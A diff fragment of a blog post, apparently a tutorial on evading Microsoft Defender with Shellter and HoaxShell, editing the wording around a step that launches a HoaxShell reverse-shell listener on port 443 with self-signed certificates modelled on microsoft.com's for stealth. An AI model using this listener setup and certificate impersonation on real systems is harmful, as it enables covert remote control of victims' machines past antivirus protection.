MrTiz/MrTiz.github.io/_posts/2025-02-22-defender-evasion-shellter-hoaxshell.md

 ![](/assets/img/defender-evasion-shellter-hoaxshell/self-signed_certs.png)
 In generating the certificate, the same parameters were used as in the certificate issued for [microsoft.com](https://www.microsoft.com), but it is optional; I only did it because it may increase the stealthiness of the attack.

-After that, we can start HoaxShell listening on port 443:
+After that, I started HoaxShell listening on port 443:
 ```sh
 hoaxshell -s 192.168.182.128 -c /home/MrTiz/DefenderBypass/certs/cert.pem -k /home/MrTiz/DefenderBypass/certs/key.pem -H 'ms-commit-id' -r
 ```